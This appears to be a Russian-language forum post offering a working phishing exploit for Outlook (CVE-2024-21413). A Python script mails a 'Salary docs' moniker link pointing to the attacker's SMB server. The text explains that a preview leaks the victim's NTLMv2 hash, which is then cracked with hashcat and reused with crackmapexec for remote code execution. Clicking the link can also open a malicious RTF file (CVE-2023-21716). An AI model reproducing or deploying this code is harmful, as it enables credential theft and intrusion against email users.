CVE-2024-21413 + hashcat + crackmapexec smb = RCE
В 27 строке нужно указать путь до файла на твоем сервере. Для первого способа сам путь может быть любой/без файла, т.к чтобы соснифить NTLMv2 хеш достаточно предпросмотра moniker link атакующего в клиенте outlook.
Если жертва нажмет на ссылку то винда пойдет по ней и загрузит его, а если это word документ (например формата .rtf) то сразу откроет, привет CVE-2023-21716
Если жертва нажмет на ссылку то винда пойдет по ней и загрузит его, а если это word документ (например формата .rtf) то сразу откроет, привет CVE-2023-21716
Python:
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
def send_email():
# Get user input for sender's email address and password
sender_email = input("Enter your Outlook email address: ")
sender_password = input("Enter your Outlook email password: ")
# Get user input for receiver's email address
receiver_email = input("Enter the recipient's email address: ")
# Create a new message object
msg = MIMEMultipart()
# Add sender, receiver, and subject to the message
msg['From'] = sender_email
msg['To'] = receiver_email
msg['Subject'] = input("Enter email subject: ")
# Ask user if they want to add a link attachment
add_attachment = input("Do you want to add a link attachment? (yes/no): ").lower()
if add_attachment == 'yes':
html_content = """\
<!DOCTYPE html>
<html lang="en">
<body>
<p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>
</body>
</html>"""
msg.attach(MIMEText(html_content, 'html'))
# Connect to SMTP server and send email
with smtplib.SMTP('smtp-mail.outlook.com', 587) as server:
server.starttls()
server.login(sender_email, sender_password)
server.send_message(msg)
print("Email sent successfully.")
if __name__ == "__main__":
send_email()
Последнее редактирование: